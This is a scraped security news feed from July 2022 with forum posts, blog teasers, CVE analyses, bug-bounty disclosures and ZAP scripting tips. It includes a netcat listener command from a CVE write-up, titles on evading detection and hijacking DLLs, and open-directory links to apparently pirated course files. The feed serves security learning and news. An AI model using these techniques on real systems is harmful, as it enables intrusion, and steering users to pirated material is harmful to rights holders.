    submitted by /u/Tristanrodz
    New forensic file format
    Hello all, a while ago I started to design and build a PoC regarding an increase in read/write performance with a new forensic file format. The PoC resulted in the specification of a first, then a second improved version of a new file format for forensic images, "zff", as an alternative to the meanwhile quite outdated EWF, AFF, ... formats. Zff has the potential (depending on the input data) to provide a significant speed increase (see benchmarks at https://github.com/ph0llux/zff). Furthermore, zff offers a massively expanded feature set:
    - physical and logical dumps
    - multiple dumps (both logical and physical) in one container, keeping related evidence together
    - extension of existing containers (with both logical and physical dumps)
    - hashing algorithms used for integrity purposes considered most secure, fast and modern at the moment
    - optional data encryption (even partially, if desired) (for security purposes)
    - optional digital signature of stored data (for authenticity purposes; using a public-private key method)
    - great flexibility when adding descriptions to cases
    - and much more
    The documentation of the file format can be found at https://zff.dev (website is work in progress). I've also written a reference implementation to create, analyze and handle files in zff format. The library is written in Rust and can be found at https://github.com/ph0llux/zff. You can try it out yourself using the tools zffacquire, zffmount and zffanalyze (see the GitHub link). We've tested the tools ourselves, but if you find any errors in the reference library, please open a GitHub issue. submitted by /u/ph0llux
    Windows honeypots for forensic analysis
    Hi All, Has anyone here used Windows virtual machines or devices as honeypots to capture malicious activity and artifacts? I'm interested in gathering logs, pcaps, memory and images, much like the content published by The DFIR Report. I'm curious to hear what risks and challenges were faced, as well as what lessons were learnt. Cheers submitted by /u/netw0rknovice
    Using cloud storage as a forensic collection platform
    Hi CF! I'm engaging with a client who wishes to obtain a number of documents from ~50 different sources. They are cost conscious, and are considering whether they can set up a platform and enable the sources to put files there, including relevant file hashes etc. These sources would be the complainant in this case, and the client would be the lawyer. I'm inclined to go with good old-fashioned physical collection using write-blockers et al., but I'm always conscious I might be missing something. Any thoughts, wise people? submitted by /u/smartypantz_

    Interesting blogs/books about cyber security in large scale and complex infrastructures
    I work for a company that is particularly disorganized, due to a long series of mergers. The whole infrastructure is fragmented, rendering even simple security operations very hard and long to complete. Working in this environment is frustrating, but the worst part is that, with my experience, I really don't have any clue on how to handle such a level of complexity. I would like to read some inspiring article that explains how big infrastructures - like in FAANG-like companies - are secured against cyber attacks. Do you know any interesting blog for this purpose? Or books? submitted by /u/subseven93
    Need recommendation for studying ISO 27005
    Could you please recommend the best studying material for ISO 27005? submitted by /u/OmegaMan-PT
    Practical uses of MITRE ATT&CK MATRIX
    What are the practical applications of the matrix? The only one I know of and have seen is to use it to identify whether, within one's perimeter, one can identify and block any TTPs, but is that the only practical application? What are some other uses? Thanks submitted by /u/woodpmirror

    Defeating Javascript Obfuscation
    submitted by /u/baryoing
    Confuser - New Dependency Confusion Detection Tool
    submitted by /u/nibblesec
    A repository of Windows persistence mechanisms
    submitted by /u/CyberMasterV
    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher
    PART 1: How I Met Your Beacon - Overview
    submitted by /u/gid0rah

    I mean, IDOR is NOT only about others ID
    Hi folks! In this write-up, I’m going to talk about the vulnerability I found to broaden your perspective on IDORs. Continue reading on InfoSec Write-ups »
    How I was able to Take over a support chat using leaked Keys
    Hello Everyone.  First, let me introduce myself. I’m Pliskin ( from MGS x) ), I’m an associate systems engineer, CTF player and I do some… Continue reading on Medium »
    Welcome to Hats, Idle Finance.
    Another great team joins the Hats Finance Bounty Program! Welcome Idle Finance, excited to have you onboard. Continue reading on Medium »
    Slavi Announced Bug Bounty Program
    Hello everyone! We are excited to run a global bounty campaign to test our brand-new Slavi Wallet and bring the revolutionary blockchain… Continue reading on Medium »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
    Balancer DoS Bugfix Review
    On May 14th, ChainSecurity employee @k_besic reported a vulnerability classified as “Medium” in Balancer protocol. The vulnerability… Continue reading on Immunefi »
    Bug Bounty
    In 2021 hackers made off with $14 Billion in cryptocurrency, double the 2020 figures of $7 billion. 2022 will be no different. DeFi… Continue reading on Medium »

    PART 1: How I Met Your Beacon - Overview - @MDSecLabs
    submitted by /u/dmchell

    Show HN: Open API and GraphQL Fuzzing via GitHub Actions
    Schemathesis is a specification-centric API fuzzing tool for Open API and GraphQL-based applications. I've been building Schemathesis GitHub app for a while and now it is ready to use. You run it as a part of your workflow, then it comes to PRs and adds little reports about API fuzzing results. Folks, I'd appreciate your feedback about the tool or its GitHub integration :) Comments URL: https://news.ycombinator.com/item?id=32193967 Points: 2 # Comments: 0

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN Community; How to shut off a car engine via a GPS tracker by ourren; Visualized full-link log tracing by ourren; A study guide to pre-trained language models for code representation: principles, analysis and code by ourren. For more of the latest articles, please visit SecWiki

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview

    MSA #1 How to Generate & Install the Burpsuite Certificate in the Nox Emulator
    What needs to be prepared : Continue reading on Medium »
    A Lab for Practicing Azure Service Principal Abuse
    Introduction Continue reading on InfoSec Write-ups »
    Being a Blue Team Member in Cybersecurity
    Being a Blue Team Member in Cybersecurity Continue reading on Bilişim Hareketi »

    "Implementation Opinions on Carrying Out Cybersecurity Service Certification Work (Draft for Comments)" released
    The certification rules and certification mark will be separately formulated and issued by the State Administration for Market Regulation after consulting the Cyberspace Administration of China and the Ministry of Public Security.
    FreeBuf Morning Report | Threat actors use GoMet to attack Ukraine; Conti breaches and encrypts the Costa Rican government
    Conti breached and encrypted the Costa Rican government.
    FreeBuf Weekly | Bandai Namco confirms it was hacked; Albanian government hit by "massive cyberattack"
    Happy weekend, FreeBufers~ Here is this week's "FreeBuf Weekly"!
    Enterprises should narrow the attack-defense gap | Reading the "2022 Enterprise Attack Surface Management" report
    HackerOne has released the "2022 Enterprise Attack Surface Management" report.
    Security management and auditing of system logs | FreeBuf enterprise-side group discussion topic
    How do you recover system logs that were wiped during an attack? How should log management be done day to day? Is auditing them rather troublesome?
    Atlassian fixes a critical Confluence vulnerability
    Atlassian has released security updates.
    Microsoft Teams outage causes Microsoft 365 service disruption
    A recent minor Microsoft Teams glitch nevertheless paralyzed multiple Microsoft 365 services integrated with Teams.
    Operation (호랑이머리깃발) ShadowTiger: the forest-roaming tiger entrenched on Buramsan (佛岩山)
    In 2019, the QiAnXin Threat Intelligence Center published "Blocking Operation 'Phantom': QiAnXin severs the claws that the Northeast Asian APT group '虎木槿' (Tiger Hibiscus) extended toward important domestic institutions".
    Google blocked the world's largest computing society (ACM)
    Google Search and Google Drive mistakenly flagged links to the research papers and website of the world's largest computing society (ACM) as malware.
    Hands-on learning of SQL injection to Getshell
    Hands-on learning of getting a shell via SQL injection; come and try it out yourself!

    CAD files for a free energy, perpetual motion machine
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Mirrors
    https://mirrors.dtops.cc submitted by /u/ilikemacsalot
    all the insurance application forms you could ever want
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    CVE Trends – Crowdsourced CVE Intel
    Article URL: https://cvetrends.com/ Comments URL: https://news.ycombinator.com/item?id=32187798 Points: 2 # Comments: 0

    Sh*Load exploits: SHA Hardware Offload w/o Error Checking
    submitted by /u/Unique-Enthusiasm-54
    Gitlab Project Import RCE Analysis (CVE-2022-2185)
    submitted by /u/CyberMasterV
    The Return of Candiru: Zero-days in the Middle East
    submitted by /u/stashing_the_smack
    GitHub - TheOfficialFloW/bd-jb: The first bd-j hack.
    submitted by /u/jeandrew
    Django web applications with enabled Debug Mode, DB accounts information and API Keys of more than 3,100 applications were exposed on internet.
    submitted by /u/zwrinerlucas

    Would like to learn about malware and how it is implemented
    I'm just about completely new to hacking/cybersecurity-related affairs and would like to learn about malware, mainly Trojan horses and specifically those that plant cryptocurrency miners or perhaps ransomware. How do these work, where can they be found, how are they implemented, and is it legal to possess them? If possible, please explain in simple terms. P.S.: I feel like I should add that this is just for fun and to satisfy my curiosity, not for malicious or criminal reasons. Thank you for your help! submitted by /u/Antique__throwaway
    Is /Browser a legitimate named pipe, and if so, what does it do?
    I see SMB named pipes called “Browser” in traffic, but I can’t find any documentation on it. There’s a lot of Metasploitable and Conficker related articles about it, but nothing I can find with legitimate uses. \Browser* submitted by /u/Free-Roaming-Orange
    System information in the URL?
    SIEM tool flagged a warning for the website and the URL was like this. The retracted part looked like a hash. Is there a legitimate use case where such data is passed in the URL? "http://randomwebsite.com/update?os=win&arch=x86&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=103.0.5060.114&lang=hu&acceptformat=crx3&x=%3D1.0.5690.34919%26installsource%3Dnotfromwebstore%26installedby%3Dinternal%26uc" submitted by /u/sec_admin

    Unrecognized file system on FTK imager
    Hoping to get some help here as I am new to computer forensics. I’m trying to analyze a .raw memory capture that is 5 GB in FTK, but it is showing “unrecognized file system” when trying to view the contents. submitted by /u/1rangusN1dangus

    fix(cmd-socketio-server): mitigate cross site scripting attack #2068
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1638984 - Bounty: $100

    What is a red team?
    The red team refers to highly-expert security professionals who can break into defenses and attack systems. Red teams are independent… Continue reading on Medium »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on System Weakness »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on Medium »

    Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities
    @bxmbn Continue reading on Medium »
    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
    How I Test For Web Cache Vulnerabilities + Tips And Tricks
    @bxmbn Continue reading on Medium »
    Installing Kali Linux as Portable Live USB for Pentesting.
    Hello Amazing People, Continue reading on Medium »
    Android App Pentest #1: Setting Up the Burpsuite Certificate on the Android Emulator
    Burpsuite is a tool that is very frequently used for Penetration Testing / Bug bounty. Burpsuite is used as an intermediary… Continue reading on Medium »
    HackerOne CTF: Postbook
    I recently published an article on a CTF writeup, an introduction to the HackerOne CTF. You can find that article here. Today I am… Continue reading on Medium »

    War in Ukraine / July 20
    Day 148: The logistical “nightmare” of supplying the Ukrainian army Continue reading on Medium »
  • Open

    CVE-2022-23131: Zabbix Login Bypass Vulnerability Reproduction
    Reproducing vulnerability CVE-2022-23131
    CCSIP 2022 China Cybersecurity Industry Panorama (4th edition) officially released | FreeBuf Consulting
    On July 21, 2022, FreeBuf Consulting, part of the domestic security industry portal FreeBuf, officially released the CCSIP 2022 China Cybersecurity Industry Panorama (4th edition).
    FreeBuf Morning Report | Microsoft freezes hiring in its security division; ransomware victims down 34% quarter over quarter in Q2
    Microsoft is eliminating many open positions, including in its Azure cloud business and its security software division. Microsoft confirmed that the hiring freeze will continue for the near term.
    IoT Endpoint Security: Introduction and Practice, Working with IoT Firmware (Part 2)
    This article systematically introduces the concepts, techniques, tools and frameworks of endpoint device firmware emulation, as well as the process and techniques of manual firmware emulation.
    Email Phishing Drill Guide
    Whether in offensive/defensive exercises or when facing APT threats, employee security awareness has become the area most responsible for enterprise security risk.
    Multiple Play Store apps distribute malware
    The Hacker News reports that Google has removed several fraudulent apps from the official Play Store.
    Kaspersky warns of incoming Luna ransomware
    Luna can encrypt devices running multiple operating systems, including mainstream OSes such as Windows, Linux and ESXi.
    Cyberspace Administration of China acts: Didi fined 8.026 billion yuan
    The Cyberspace Administration of China imposed a fine of RMB 8.026 billion on Didi Global Inc. in accordance with the law.
    Cisco fixes bug that allowed attackers to execute commands as root
    Cisco addressed a critical vulnerability in the Cisco Nexus Dashboard data center management solution.
    Gartner Security Operations Hype Cycle released: where is XDR, now at the peak, headed?
    XDR reaching the peak did not bring people closer to agreement on the view that "XDR will become the key technology of future security operations"; rather, it further sharpened the disagreement.
    Neopets suffers data breach, source code and database stolen
    Virtual pet website Neopets suffered a data breach in which source code and a database containing the personal information of more than 69 million members were stolen.
    WIKI Knowledge Continent invites you on a co-building journey: "Accept" or "Agree"?
    The "WIKI Knowledge Continent" co-building train has arrived and is waiting for you; check your ticket and board!
    Scammers are using fake YouTube Google search results
    Cybersecurity company Malwarebytes disclosed scams carried out using fake YouTube Google ad search results.
  • Open

    SecWiki News 2022-07-21 Review
    A brief analysis of JNDI injection by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    Tag Blending Obfuscation In Property-Based Payloads
    Property-based payloads are payloads based on some particular properties of the document object and the elements. From the document object we already know the location-based payloads, and from the elements we have the properties “innerHTML” and “outerHTML”. Those 3 are very useful to evade a filter or WAF when we get to the point where … Continue reading Tag Blending Obfuscation In Property-Based Payloads The post Tag Blending Obfuscation In Property-Based Payloads appeared first on Brute XSS.
  • Open

    Keep your finger on the pulse of the most critical software vulnerabilities in the market
    Hackers can deploy exploits in a week or less. That reality keeps many up at night, and given it’s nearly impossible to keep up with all updates for all software on your own, it’s critical to prioritize which applications need attention first. Understanding vulnerabilities A vulnerability is an error in software that can be exploited with a security impact and gain. Secunia Research validates, verifies and tests vulnerability information to author security advisories. These advisories provide valuable details by following consistent and standard processes that have been refined over the years. Whenever a new vulnerability is reported and verified, a Secunia…
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
    The 2022 Unit 42 Network Threat Trends Research Report includes an analysis of the CVEs most commonly exploited in 2021 and predictions for which CVEs attackers will likely focus on in the year to come. The post Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report appeared first on Unit 42.
  • Open

    Valve stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    lots and lots of old flash games
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    HTB-Business CTF
    No content preview
  • Open

    Analysis of Cloud Sandbox Traffic Identification Techniques
    Author: Fengqi. This article is a contributed piece; Seebug Paper looks forward to your submissions, and every accepted one receives a gift! Submission mailbox: paper@seebug.org. Preface: Hello everyone, I am Fengqi, and this time I bring traffic-based sandbox identification techniques. As everyone knows, sandbox identification is an old topic; most current identification approaches work from the sample side, for example the conventional methods: hardware checks (CPU core count, input/output devices, memory), mouse movement checks, process names, system services, uptime and so on, none of which can...
  • Open

    DOM XSS on ads.tiktok.com
    TikTok disclosed a bug submitted by 0x7: https://hackerone.com/reports/1549451 - Bounty: $2500
    Internal Employee informations Disclosure via TikTok Athena api
    TikTok disclosed a bug submitted by hein_thant: https://hackerone.com/reports/1575560 - Bounty: $1000
    Can access the job name, creator name and can report any draft/under review/rejected job
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1581528 - Bounty: $1000
    LFI via Jolokia at https://...:1293
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1641661
  • Open

    TryHackMe | OhSINT Writeup
    TryHackMe’s OhSINT room writeup, from a single photo to finding a person’s password. Continue reading on Medium »
    Where is MDI? — Raw Security Chats 0x04 (OSINT)
    In this post I will try to explain how, in the 4th episode of Raw Security Chats, we found Mehmet Abi's location using OSINT. Continue reading on Medium »
    War in Ukraine / July 19
    Day 147: Ukraine promotes the Kherson direction Continue reading on Medium »
  • Open

    PATH Variable
    Exploiting the PATH variable to gain access to the system by obtaining a shell with maximum privileges. Continue reading on Medium »
    Windows Desktop (Thick) Client Pentesting — DLL Hijacking
    Welcome white hats! Have you ever done thick client pentesting? Have you ever found DLL hijacking in real engagement? I know that it is… Continue reading on Medium »
  • Open

    ZeroTrust Certifications?
    Any zerotrust related security certifications? Thanks in advance. submitted by /u/DisturbedBeaker [link] [comments]
    Good mid-level Incident Response training?
    Good morning, The vast majority of all alerts generated that I have experience with are simple auto-remediated stuff through Microsoft Defender for Endpoint or just easy Q&A type of stuff (like, large volume of data being deleted...look who it is and what it is, ask a question, resolve the alert, etc). I have realized that "true" IR is an area I feel very unprepared for, so my question to the Reddit community is, what are your recommendations on some beneficial mid-level IR training? By mid-level I mean that I won't be doing incredibly detailed stuff like forensics, but I do want to learn a bit of hands-on procedures/methodology and not have it all just be higher level theory/design. Thanks! submitted by /u/ToLayer7AndBeyond [link] [comments]
  • Open

    [Security Bulletin] Weblogic July update fixes multiple high-risk vulnerabilities
    Recently, Oracle released its July 2022 security update, covering 349 vulnerabilities in its products (Weblogic Server, Database Server, Java SE, MySQL, etc.). Among the vulnerabilities fixed this time...
  • Open

    Multiple Vulnerabilities in Atlassian Products
    submitted by /u/sullivanmatt [link] [comments]
    [CVE-2022-34918] A crack in the Linux firewall
    submitted by /u/gquere [link] [comments]
    DNS-over-HTTP/3 in Android
    submitted by /u/SeanPesce [link] [comments]
    Cloud is more fun with an SSRF
    submitted by /u/Ancient_Title_1860 [link] [comments]
    Session On Android – An App Wrapped in Signal
    submitted by /u/jeandrew [link] [comments]
  • Open

    From Stack Trace Laravel Leads to Privilege Escalation [Admin]
    Hi! In this article I will only tell a little about the findings that I think are interesting to be used as stories on my medium.com xD Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks & Cara Mencegahnya / Patched #Episode_SSRF1
    Serangan Server-Side Request Forgery (SSRF) memungkinkan penyerang membuat permintaan ke domain apa pun melalui server yang rentan… Continue reading on Medium »
    Initial Setup Genymotion & Burpsuite for Android Mobile App Pentest(Bahasa)
    Pada kesempatan kali ini, saya menulis artikel mengenai instalasi genymotion dan burpsuite yang akan digunakan untuk melakukan penetrasi… Continue reading on Medium »
    Instalasi Genymotion dan pemasangan Burpsuite certificate pada emulator Genymotion
    Halo teman-teman, selamat datang di post medium pertama saya. Pada post ini saya akan membagikan tutorial bagaimana cara instalasi… Continue reading on Medium »
    Genymotion Device Installation and Burpsuite Certificate Installation in Genymotion Emulator…
    First, open Genymotion App Continue reading on Medium »
    Maximizing the potential of the “Subfinder”
    Hi guys, in this post I will be sharing about how to maximize the potential of subfinder. So, what is subfinder? and how to use it… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-20 Review
    Some thoughts on security intelligence capabilities and applications by ourren; Exploring and identifying JSONP honeypots across the internet by ourren; A winding code audit + penetration + WAF bypass + privilege escalation in practice by ourren; Web3 Development Outlook Research Report by ourren; A new attempt at sample similarity analysis: via audio by Avenger; IoT Endpoint Security: Introduction and Practice, Understanding IoT Endpoints (Part 2) by ourren; IoT Endpoint Security: Introduction and Practice, Working with IoT Firmware (Part 2) by ourren; IoT Endpoint Security: Introduction and Practice, Working with IoT Firmware (Part 1) by ourren; IoT Endpoint Security: Introduction and Practice, Understanding IoT Endpoints (Part 1) by ourren; On decrypting the X信 database and forensics by ourren. For more of the latest articles, visit SecWiki
  • Open

    Playing with Risk using ZAP Alert Filters
    Alert filters: Alert filters are a filter feature for easily managing the issues (Alerts) that ZAP has found. Depending on the conditions you specify, you can adjust an Alert's Risk Level or hide it. It is not a feature used often when ZAP is used as a Proxy, but when ZAP is used as a DAST service, for example in DevSecOps, using it well can greatly improve the accuracy of the issues found. Alert filters come in two forms: Context Alert Filters and Global Alert Filters. Context Alert Filters: Context Alert Filters are Alert filters that target each Context (Scope). They can be set on a specified Context, and only Alerts added to that Context are affected. Context > Alert filters. Global Alert Filters: Global Alert Filters are Alert filters applied across all of ZAP. Options > Global Alert Filters. Structure of an Alert filter (field, type, description, example): Scope, fixed value, Global/Context; Name; Alert Type, condition, if the Alert name matches, e.g. XSS, SQL Injection; URL, condition, if the URL matches, e.g. https://google.com; URL is Regex?, condition, whether to use a regular expression when matching the URL, true/false; Parameter, condition, if the parameter matches, e.g. query; Parameter is Regex?, condition, whether to use a regular expression when matching the parameter, true/false; Attack, condition, if the attack code matches, e.g. query=; Attack is Regex?, condition, whether to use a regular expression when matching the attack code, true/false; Evidence, condition, if the detection result matches, e.g. aaa aaa; Evidence is Regex?, condition, whether to use a regular expression when matching the detection result, true/false; New Risk Level, result, the Risk Level to assign, False Positive, Low, Medium; Enabled, status, whether this Filter is...
  • Open

    More to find in a previous post.
    http://s28.bitdl.ir/ >> Follow your nose and see what you find... http://s28.bitdl.ir/Video/ Good stuff in here. http://s28.bitdl.ir/Compresed/ More good stuff in here... http://s28.bitdl.ir/Compresed/Lynda/ http://s28.bitdl.ir/Compresed/OREILLY/ http://s28.bitdl.ir/Compresed/Udemy/ submitted by /u/klutz50 [link] [comments]
    geometry, topology and comp-sci papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    How about finding open directories that are nofollow?
    Any good methods for finding nofollow open directories? submitted by /u/G-Streams [link] [comments]
  • Open

    FreeBuf Morning Report | Albanian government hit by "massive cyberattack"; BlackBerry 2022 Threat Report
    The Council of the European Union warned of malicious cyber activity conducted by threat actors against the backdrop of the ongoing conflict between Russia and Ukraine.
    "Douxiang Attack-Defense Exercise Handbook": deploying "cloud honeypots" with a clever hand
    One article to see clearly the standard, clever and poor moves of honeypot deployment
    The 10 "watershed" cybersecurity incidents of the past 10 years
    Cybersecurity vendor Trustwave listed the 10 most prominent and noteworthy cybersecurity issues and breaches of the past 10 years.
    Vulnerabilities in a well-known GPS tracker could give hackers admin privileges
    Vulnerability researchers discovered security problems with the MiCODUS MV720 GPS tracker, which is widely used by Fortune 50 companies, European governments, US states, South American military agencies and nuclear power plant operators, in about 1.5 million vehicles across 169 countries. MiCODUS MV720 user map (BitSight). A total of 6 vulnerabilities were found in the MV720 device; hackers who compromise the device can use it to track or even locate the vehicle carrying it, and can also collect information about routes through the device and manipulate data. Considering the
    Frequent upgrades: new ransomware variants keep emerging
    Over the past few weeks, FortiGuard Labs has observed several new ransomware variants.
    New CloudMensis malware is deploying backdoors on Mac devices
    The malware supports dozens of commands, including taking screenshots, stealing documents, and logging keystrokes.
    Hacker group "8220" grows cloud botnet to over 30,000 hosts
    Recently, a cryptomining gang known as the 8220 Gang has used Linux and cloud application vulnerabilities to expand its botnet to more than 30,000 infected hosts. The group's techniques are not sophisticated, but it is strongly financially motivated; it targets publicly exposed systems running vulnerable versions of Docker, Redis, Confluence and Apache, infecting hosts on AWS, Azure, GCP, Alitun and QCloud. The gang's previous attacks relied on publicly available exploits to compromise Confluence servers. After gaining access
    Abused Slack service: analysis of APT29's attack campaign against Italy
    APT29's attack activity can be traced back to 2008; its main targets include Western government organizations and think tanks.
  • Open

    SANS / GIAC examinations
    Hi there. I’m going to be taking the GCFE exam in a few months which covers SANS FOR500 material. I have not taken the FOR500 course but do have copies of the materials/books. Does anyone know if I will be able to bring these into the exam even though I have not taken the FOR500 course, as it will affect my indexing if not. Thanks. submitted by /u/Individual_Tax_5842 [link] [comments]
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    CVE-2020-8558: Accessing 127.0.0.1 across hosts
    Author: leveryd. Original link: https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA. Background: Suppose machine A and machine B are on the same LAN, and machine A runs nc -l 127.0.0.1 8888; can machine B reach a "service bound only to 127.0.0.1" on machine A? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Research and vulnerability analysis of the Linux kernel nftables subsystem
    Author: Venustech ADLab (启明星辰ADLab). Original link: https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ. 1 Background: Recently, the open-source security community oss-security disclosed several vulnerabilities related to the Linux kernel netfilter module. All of them lie in the nftables subsystem of netfilter; two of them have existed in the kernel for years, and all can be used for kernel privilege escalation. The vulnerability IDs are: CVE-2022-32...
  • Open

    Browser API Fuzzing with Dynamic Mod-Ref Analysis [pdf]
    Article URL: https://nebelwelt.net/files/22FSE.pdf Comments URL: https://news.ycombinator.com/item?id=32161267 Points: 1 # Comments: 0

  • Open

    NiCOFF: COFF and BOF Loader written in Nim
    submitted by /u/DarkGrejuva [link] [comments]
    WINDOWS PASSWORD MINING
    submitted by /u/Clement_Tino [link] [comments]
    Master Student In Need Of Red Teamers
    Hello everyone! My name is Andrei and I am a master's student at the Technical University of Eindhoven (The Netherlands). I'm studying Information Security Technology, which is just fancy wording for cybersecurity. Currently, I am working on my master thesis, titled "Analysis of WMI-based Attacks in Microsoft Windows Environments" (the title is a work in progress). The main research idea is to look into what are the differences in how WMI is used by sysadmins vs how it is being misused by threat actors. Then, by identifying these differences, I can choose criteria that can be used for detection systems to lower the number of false positives specifically for WMI. And here comes my question. For my methodology, I need to hold a number of interviews with professionals from the sysadmin pool and from the pentester/red team pool. I am looking in this sub for red teamers who have work experience abusing WMI, who have a max of 45 minutes of free time, and have an open mind to have an informal and fun conversation with a student. The interview is a mix of open questions and filling in an Excel sheet. The sheet contains PowerShell and WMIC commands split into three categories: Enumeration, Code Execution, and Persistence. I am interested if you ever used those commands, in what context, and a concrete example. My list is also open for additions, probably I did not cover every command which can be used. I won't ask for too much personal information, only the name, position, and company you work/worked at. I would like to have a diverse pool of professionals (different companies etc,). I will also send the questions and sheet in advance so you have an idea of how to answer some of them. Thank you for reading and I hope some of you would be interested in helping me or at least forwarding my request to people that would want to help me! And even if you can't help, a like or comment would help bump the post so it can get more attention. submitted by /u/MidWarz [link] [comments]
  • Open

    Hunting unknown vulnerability classes
    — Based: BlackHatBCS tradc— Continue reading on Medium »
    My Essential Recon Commands
    Resolution Continue reading on Medium »
    Step-wise Checklist for Web Penetration and Bug Hunters
    This checklist may help you to have a suitable methodology for bug bounty hunting. When you have done an action, don’t forget to check ;)… Continue reading on Medium »
    JSON web tokens (JWT) attacks
    What are JWTs? Continue reading on Medium »
    How i was able to bypass Open Redirect 3 times on same program.
    Hello Security folks, Here is interesting finding which I want to share. As you know i only write if it’s unique finding or if my approach… Continue reading on Medium »
  • Open

    War in Ukraine / July 18
    Day 146: Russia can force Ukraine to prolong the war Continue reading on Medium »
    OSINT Cheatsheet (sites,tools)
    Overview Continue reading on Medium »
    How to hire a threat intelligence analyst
    Alongside growing division across the world is a severely unstable, and therefore unpredictable, global economy. Ongoing conflicts, a… Continue reading on Medium »
    CyberSoc CTF — General Knowledge
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    imaginaryCTF: Unpuzzled4
    The Challenge Continue reading on Medium »
    imaginaryCTF: Journey
    The Challenge Continue reading on Medium »
  • Open

    Writeup for Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
    submitted by /u/xnyhps [link] [comments]
    Microsoft Azure Arc Logging Passwords in Plaintext
    submitted by /u/dinobyt3s [link] [comments]
    The Workings of Whatsapp's Backups (and why you should enable End-to-End Encrypted Backups)
    submitted by /u/IceCereal [link] [comments]
    chip-red-pill/MicrocodeDecryptor - understand how Intel mitigated spectre vulnerability, explore the implementation of Intel TXT, SGX,VT-x technologies
    submitted by /u/Gallus [link] [comments]
    EJS, Server side template injection RCE (CVE-2022-29078)
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-07-19 Review
    Incident response for a new type of websocket memory webshell by ourren; Looking at cybersecurity review through the CNKI investigation by ourren; How to build a product for the defense sector from 0 to 1 by ourren; 2022 Software Supply Chain Security Technology White Paper by ourren; What I think the future of cybersecurity tools is: opening piece by ourren; Linux persistence by ourren; Anti-anti-honeypot: the flaws of three anti-honeypot plugins as examples by ourren; A WAF design approach based on tracking markers by ourren. For more of the latest articles, visit SecWiki
  • Open

    Announcing Rust 1.62.1 (Vulnerability Fixed)
    Article URL: https://blog.rust-lang.org/2022/07/19/Rust-1.62.1.html Comments URL: https://news.ycombinator.com/item?id=32152495 Points: 2 # Comments: 0
    Multiple vulnerability leading to account takeover in TikTok SMB subdomain
    Article URL: https://hackerone.com/reports/1404612 Comments URL: https://news.ycombinator.com/item?id=32147645 Points: 2 # Comments: 0
  • Open

    Learning ZAP Scripting the easy way
    Today I'd like to introduce two examples that are good for getting familiar with ZAP Scripting when you first encounter it. If you read this post, you will learn how to query data in ZAP or request 3rd-party scans with simple code 😊. ZAP Scripting: In ZAP, if you click Scripts in the Tree Window on the left, you can see scripts by type. And if you click the Script console in the middle Workspace window, a space appears where you can write and test scripts. Today I'm going to talk about Targeted scripts here as well. Targeted Script: In ZAP, a Targeted Script is a script that can be run on each Request/Response. Basically you can get Request and Response information through the msg object, and write scripts based on it. Usually somewhat tedious tasks such as scanning jobs or Payload generation are turned into scripts and used that way. Structure: The structure is simple. If you define the invokeWith method, then when you right-click in History > Invoke with Scripts > select the script to run, that script is executed, and at that time the Req/Res information is received as the msg Object. function invokeWith(msg) { // logic! } Msg object: Frequently used code snippets. var url = msg.getRequestHeader().getURI().toString(); // https://www.hahwul.com var host = msg.getRequestHeader().getURI().getHost(); // www.hahwul.com var req = msg.getRequestHeader().toString()+msg.getRequestBody().toString() // POST /blahblah // // a=1 var responseBody = msg.getResponseBody().toString() // // blahblah.. var responseHeader = msg.getResponseHeader().getHeader("Server") // Apache Searching on the web: openUrlInBrowser. The org.zaproxy.zap.utils.DesktopUtils.openUrlInBrowser() function is a feature provided by ZAP that opens the URL received as an argument in a browser. Proxied...
  • Open

    AWS EC2 Auto Scaling Privilege Escalation
    Introduction Continue reading on Medium »
  • Open

    Fully Exploiting Data Sources
